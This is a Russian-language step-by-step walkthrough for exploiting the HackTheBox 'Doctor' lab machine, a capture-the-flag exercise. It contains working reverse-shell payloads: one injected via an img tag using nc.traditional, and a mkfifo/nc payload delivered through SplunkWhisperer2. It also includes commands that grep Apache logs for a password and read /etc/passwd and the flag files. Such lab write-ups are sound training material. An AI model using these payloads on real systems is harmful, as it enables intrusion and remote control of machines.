HackTheBox - эксплуатация виртуальной машины Doctor

1. Manual https://www.youtube.com/watch?v=GZDo8xylr2o
2.  
3. Открываем терминал
4. cd Desktop/
5. sudo openvpn askanton.ovpn
6. Делим терминал горизонтально
7. ping 10.10.10.209
8. открываем новый терминал
9. sudo nmap -A 10.10.10.209
10. находим 80-й порт и отріваем адрес в браузере
11. находим сайт
12. Смотрим сорс
13. Проверяем результат nmap, находим doctors.htb
14. nano /etc/hosts
15. 10.10.10.209 doctors.htb
16. открываем doctors.htb
17. Проходим регистрацию
18. логинимся
19. Смотрим сорс
20. находим archive, открываем
21. Смотрим сорс
22. Создаем сообщение
23. Проверяем возможность иньекции
24. https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
25. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
26. ${7*7}
27. sudo ifconfig
28. Пытаемся получить обратную консоль
29. nc -lvp 7777
30. <img src=http://10.10.14.105/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.105'$IFS'7777')>
31. смотрим где мы
32. hostname
33. python3 -c 'import pty; pty.spawn("/bin/bash")'
34. cd /home
35. ls
36. находим пользователя shaun
37. cd /shaun
38. cat uset.txt
39. Ищем информацию
40. сd /etc
41. ls
42. cat passwd
43. cd /var
44. ls
45. cd log
46. ls
47. cd apache2
48. ls
49. cat backup | grep pass
50. Получаем пароль Guitar123
51. su shaun
52. Guitar123
53. Получаем ключ пользователя
54. cat /home/shaun/user.txt
55. Ищем уязвимости спланка
56. https://github.com/cnotin/SplunkWhisperer2
57. git clone https://github.com/cnotin/SplunkWhisperer2
58. cd SplunkWhisperer2
59. ls
60. cd PySplunkWhisperer2
61. Слушаем еще один порт
62. nc -lvp 7778
63. python3 PySplunkWhisperer2_remote.py --lhost 10.10.14.105 --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "rm /tmp/void;mkfifo /tmp/void;cat /tmp/void|/bin/sh -i 2>&1|nc 10.10.14.105 7778 >/tmp/void"'
64. hostname
65. python3 -c 'import pty; pty.spawn("/bin/bash")'
66. cd /root
67. ls
68. cat root.txt
69.